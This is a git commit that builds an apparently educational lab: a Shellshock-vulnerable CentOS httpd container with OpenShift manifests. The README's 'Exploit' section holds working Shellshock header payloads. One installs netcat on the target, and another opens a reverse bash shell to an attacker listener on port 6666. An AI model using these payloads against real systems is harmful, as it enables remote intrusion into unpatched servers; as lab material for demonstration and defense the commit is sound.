initial commit

5 years ago · 0a2893663f
9 changed files with 222 additions and 0 deletions
--- a/shellshock/Dockerfile
+++ b/shellshock/Dockerfile
@ -0,0 +1,5 @@
+FROM vulnerable-centos:6
+COPY rootfs .
+RUN yum install -y httpd
+EXPOSE 80 443
+ENTRYPOINT ["/entrypoint.sh"]
--- a/shellshock/README.md
+++ b/shellshock/README.md
@ -0,0 +1,83 @@
+# Shellshock vulnerable image
+
+## Build
+
+Old CentOS images are here: https://vault.centos.org/
+
+Install it in a virtual machine.
+
+```sh
+sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso
+```
+
+Mount the qcow2 image as explained [here](https://gist.github.com/shamil/62935d9b456a6f9877b5).
+
+```sh
+sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
+sudo mount /dev/mapper/VolGroup-lv_root /mnt/
+sudo tar -cvf /tmp/centos6.tar . -C /mnt
+sudo umount /mnt
+sudo qemu-nbd --disconnect /dev/nbd0
+```
+
+Create the container image.
+
+```sh
+sudo podman import /tmp/centos6.tar vulnerable-centos:6
+sudo buildah bud -t vulnerable-httpd:centos-6 .
+```
+
+Push the image to the registry of your choice.
+
+```sh
+sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+```
+
+## Usage
+
+```sh
+sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
+POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
+```
+
+```
+sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
+Hello, Nicolas!
+sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
+Hello, World!
+```
+
+## Deployment
+
+```sh
+oc apply -f openshift/
+```
+
+## Exploit
+
+Find the URL of the vulnerable CGI-BIN.
+
+```sh
+export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"
+```
+
+Start a C&C server.
+
+```sh
+sudo firewall-cmd --add-port 6666/tcp
+nc -l -p 6666
+```
+
+Set the IP address of the C&C server.
+
+```sh
+export SERVER_IP=192.168.6.2
+```
+
+Exploit the target.
+
+```sh
+curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
+curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"
+```
--- a/shellshock/openshift/00-namespace.yaml
+++ b/shellshock/openshift/00-namespace.yaml
@ -0,0 +1,10 @@
+apiVersion: v1
+kind: Namespace
+metadata:
+  annotations:
+    openshift.io/description: ""
+    openshift.io/display-name: ""
+  name: vulnerable-httpd
+spec:
+  finalizers:
+  - kubernetes
--- a/shellshock/openshift/10-deploy.yaml
+++ b/shellshock/openshift/10-deploy.yaml
@ -0,0 +1,32 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  labels:
+    app: frontend
+    app.kubernetes.io/component: frontend
+    app.kubernetes.io/instance: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      deployment: frontend
+  template:
+    metadata:
+      creationTimestamp: null
+      labels:
+        deployment: frontend
+    spec:
+      containers:
+      - image: registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+        imagePullPolicy: IfNotPresent
+        name: frontend
+        resources: {}
+        terminationMessagePath: /dev/termination-log
+        terminationMessagePolicy: File
+      dnsPolicy: ClusterFirst
+      restartPolicy: Always
+      schedulerName: default-scheduler
+      securityContext: {}
+      terminationGracePeriodSeconds: 30
--- a/shellshock/openshift/20-svc.yaml
+++ b/shellshock/openshift/20-svc.yaml
@ -0,0 +1,17 @@
+apiVersion: v1
+kind: Service
+metadata:
+  labels:
+    app: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  ports:
+  - name: http
+    port: 80
+    protocol: TCP
+    targetPort: 80
+  selector:
+    deployment: frontend
+  sessionAffinity: None
+  type: ClusterIP
--- a/shellshock/openshift/30-route.yaml
+++ b/shellshock/openshift/30-route.yaml
@ -0,0 +1,17 @@
+apiVersion: route.openshift.io/v1
+kind: Route
+metadata:
+  labels:
+    app: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  port:
+    targetPort: http
+  tls:
+    termination: edge
+  to:
+    kind: Service
+    name: frontend
+    weight: 100
+  wildcardPolicy: None
--- a/shellshock/rootfs/entrypoint.sh
+++ b/shellshock/rootfs/entrypoint.sh
@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Stop the scrip on any error encountered
+set -Eeuo pipefail
+
+# Start a test instance of apache
+/usr/sbin/apachectl -k start
+sleep 2
+
+# Run a test query
+curl -s http://localhost/cgi-bin/hello.cgi -H "X-Name: OpenShift"
+
+# Stop apache
+/usr/sbin/apachectl -k stop
+sleep 2
+
+# Run the real apache
+exec /usr/sbin/httpd -X
--- a/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
+++ b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
@ -0,0 +1,35 @@
+[base]
+name=CentOS-$releasever - Base
+baseurl=https://vault.centos.org/6.5/os/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#released updates
+[updates]
+name=CentOS-$releasever - Updates
+baseurl=http://vault.centos.org/6.5/updates/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#additional packages that may be useful
+[extras]
+name=CentOS-$releasever - Extras
+baseurl=http://vault.centos.org/6.5/extras/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#additional packages that extend functionality of existing packages
+[centosplus]
+name=CentOS-$releasever - Plus
+baseurl=http://vault.centos.org/6.5/centosplus/$basearch/
+gpgcheck=1
+enabled=0
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#contrib - packages by Centos Users
+[contrib]
+name=CentOS-$releasever - Contrib
+baseurl=http://vault.centos.org/6.5/contrib/$basearch/
+gpgcheck=1
+enabled=0
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
--- a/shellshock/rootfs/var/www/cgi-bin/hello.cgi
+++ b/shellshock/rootfs/var/www/cgi-bin/hello.cgi
@ -0,0 +1,5 @@
+#!/bin/sh
+
+echo "Content-Type: text/plain"
+echo
+echo "Hello, ${HTTP_X_NAME:-World}!"